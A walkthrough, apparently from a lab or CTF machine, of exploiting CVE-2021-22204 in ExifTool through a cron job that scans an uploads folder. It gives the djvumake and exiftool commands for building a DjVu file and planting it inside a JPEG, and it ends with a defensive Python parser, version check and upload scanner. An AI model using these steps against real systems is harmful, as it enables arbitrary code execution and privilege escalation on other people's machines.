
Manual exiftool linux code

ExifTool is a tool and library written in Perl that extracts metadata from almost any type of file. ExifTool could allow a local attacker to execute arbitrary code on the system, caused by improper neutralization of user data in the DjVu file format (CVE-2021-22204). By using a specially crafted image file, an attacker could exploit this vulnerability to execute arbitrary code on the system.

The vulnerability happens when ExifTool parses the DjVu file type, more specifically the annotations field in the file structure. To trigger the vulnerable function, we need to create a valid DjVu file that contains an annotation chunk with the payload; the annotation text is handed to Perl's eval, so it is executed as Perl code.

Enumeration

1. Using pspy, I noticed a script, /opt/image-exif.sh, running quite often. Right before that script I see cron being executed, so I assume this is a scheduled task.
2. Reading the contents of /etc/crontab, I confirm this is a scheduled task.
3. I tried to read the file, and I had permissions.
4. Taking a look at the script, it does the following:
   - it inspects jpg files located in /var/www/html/subrion/uploads
   - it uses exiftool to read each file and stores the EXIF data of each file in /opt/metadata
5. Knowing exiftool's installed version and confirming it is vulnerable to CVE-2021-22204 (versions 7.44 to 12.23), we proceed to exploit it.

Basic POC

1. As we verified that exiftool is vulnerable, and that it runs against a folder we can write files to, we can upload a crafted file so exiftool executes against it.
2. Create a file named payload containing the Perl code to run (the PoC runs the id command).
3. Compress the payload file so it is not human-readable; the result is payload.bzz.
4. Build the DjVu file:

   djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz

   # ANTz = writes the compressed annotation chunk from the input file
   # BGjp = expects a JPEG background image, but we can pass /dev/null to use no background image at all
   # INFO = anything in the format 'N,N' where N is a number (optional)

5. Transfer this file to the victim machine and run exiftool against it; the output should also show the output of the id command.

Note: Now we have our basic exploit for ExifTool.

Executing from a JPEG file

Our next goal is to put the malicious payload into a JPEG file and execute it from there. A DjVu file on its own isn't of much use to us, because it is not accepted by most of the file uploads that we find in the wild.

1. Embed the DjVu file in a tag of a JPEG (ExifTool's -TAG<=FILE syntax sets the tag's value from a file's contents):

   exiftool '-GeoTiffAsciiParams<=exploit.djvu' exploit.jpg

2. Rename the file so it looks like a JPG, since the script only picks up jpg files in the uploads folder.
3. Start the listener and the web server for the file transfer.
4. Wait for exiftool to execute the code; in this case the scheduled task does it for us.

Alternative commands

   djvumake exploit.djvu INFO=0,0 BGjp=/dev/null ANTa=payload

   djvumake exploit.djvu Sjbz=mask.djvu ANTa=input.txt

Both forms use an uncompressed annotation chunk (ANTa) instead of ANTz. With the second one we get to inject the command's response within the Copyright header of the metadata, so the result shows up directly in exiftool's output.

Note: As we noticed before, there was a script running on the remote victim machine; it used exiftool as a scheduled task to inspect jpg files in /var/www/html/subrion/uploads.
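To make the DjVu structure concrete, here is an added Python example (not code from this page, ExifTool or djvulibre). It builds the same minimal container djvumake produces for INFO='1,1' plus an annotation chunk, walks the IFF chunks back out of it to show exactly which chunks reach ExifTool's annotation parser, checks an exiftool version string against the 7.44 to 12.23 range, and scans an arbitrary upload for an embedded DjVu container. Everything here is an assumption of the example rather than something the page shows: the annotation text is a benign, constructed placeholder with the Perl payload deliberately left out; the builder emits an uncompressed ANTa chunk only (no BZZ for ANTz, no BGjp background); and fake_jpeg_carrier is a constructed stand-in for "a JPEG with exploit.djvu written into a tag", not the TIFF/EXIF layout exiftool actually writes for GeoTiffAsciiParams.

```python
"""Added example: build, parse and triage DjVu containers as used in CVE-2021-22204.

Not code from the page, ExifTool or djvulibre. The annotation text below is a
benign, constructed placeholder; a real payload would be Perl in that position.
"""
import struct

# Constructed stand-in for the "payload" file on the page (no Perl here).
SAMPLE_ANNOTATION = b'(metadata (Copyright "constructed test value"))'

DJVU_MAGIC = b"AT&TFORM"              # AT&T magic followed by the IFF FORM header
ANNOTATION_CHUNKS = ("ANTa", "ANTz")  # plain and BZZ-compressed annotation chunks


def _chunk(cid: bytes, data: bytes) -> bytes:
    """One IFF chunk: 4-byte ID, big-endian length, data padded to an even length."""
    pad = b"\x00" if len(data) % 2 else b""
    return cid + struct.pack(">I", len(data)) + data + pad


def build_djvu(annotation: bytes, width: int = 1, height: int = 1) -> bytes:
    """Minimal single-page DjVu: magic + FORM:DJVU holding INFO and ANTa.

    Structurally what `djvumake exploit.djvu INFO='1,1' ANTa=payload` writes;
    this builder skips BGjp and ANTz (BZZ compression) on purpose.
    """
    # INFO: width, height (BE16), minor/major version, dpi (LE16), gamma, flags
    info = struct.pack(">HHBB", width, height, 26, 0) + struct.pack("<H", 300) + bytes([22, 0])
    body = b"DJVU" + _chunk(b"INFO", info) + _chunk(b"ANTa", annotation)
    return b"AT&T" + _chunk(b"FORM", body)


def parse_djvu(data: bytes) -> list:
    """Walk the top-level chunks of a DjVu file -> [(chunk_id, payload), ...].

    Returns [] when the magic is missing. This is the walk a parser performs
    before handing ANTa/ANTz payloads to the annotation parser (the eval sink).
    """
    if not data.startswith(DJVU_MAGIC):
        return []
    form_len = struct.unpack(">I", data[8:12])[0]
    end = min(12 + form_len, len(data))
    pos = 16  # skip the 4-byte form type "DJVU"
    chunks = []
    while pos + 8 <= end:
        cid = data[pos:pos + 4].decode("ascii", "replace")
        size = struct.unpack(">I", data[pos + 4:pos + 8])[0]
        chunks.append((cid, data[pos + 8:pos + 8 + size]))
        pos += 8 + size + (size & 1)  # chunk bodies are padded to even offsets
    return chunks


def annotation_chunks(data: bytes) -> list:
    """Only the chunks whose content reaches the vulnerable annotation parser."""
    return [(cid, p) for cid, p in parse_djvu(data) if cid in ANNOTATION_CHUNKS]


def exiftool_version_vulnerable(version: str) -> bool:
    """CVE-2021-22204 affects ExifTool 7.44 through 12.23 (range given on the page).

    ExifTool prints versions as MAJOR.MM with a two-digit minor, so comparing
    (major, minor) as integers is correct for the strings `exiftool -ver` emits.
    """
    major, minor = (int(x) for x in version.strip().split(".")[:2])
    return (7, 44) <= (major, minor) <= (12, 23)


def fake_jpeg_carrier(djvu: bytes) -> bytes:
    """Constructed carrier: SOI, one APP1 segment wrapping the DjVu bytes, EOI.

    Stand-in for "a JPEG with exploit.djvu written into a tag"; it is NOT the
    TIFF/EXIF layout exiftool builds for GeoTiffAsciiParams.
    """
    app1 = b"Exif\x00\x00" + djvu
    return b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def find_embedded_djvu(blob: bytes) -> int:
    """Offset of a DjVu container anywhere in a file, or -1.

    Upload triage: a renamed .djvu and a JPEG carrying DjVu inside a tag both
    contain the magic, and ExifTool parses it in either case.
    """
    return blob.find(DJVU_MAGIC)


if __name__ == "__main__":
    djvu = build_djvu(SAMPLE_ANNOTATION)
    for cid, payload in parse_djvu(djvu):
        print(cid, len(payload), payload[:48])
    carrier = fake_jpeg_carrier(djvu)
    print("DjVu inside carrier at offset", find_embedded_djvu(carrier))
    for v in ("7.43", "7.44", "12.23", "12.24"):
        print(v, "vulnerable" if exiftool_version_vulnerable(v) else "not in range")
```

The point of the scan function is the one the page makes about uploads: checking the extension or the JPEG magic at offset 0 does not help, because ExifTool will still find and parse the DjVu container that a JPEG carries inside a tag. The version check is the control that actually matters on the host running the scheduled task: anything from 7.44 up to and including 12.23 is inside the range the page gives, so the fix is to run a newer ExifTool, not to filter file names.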
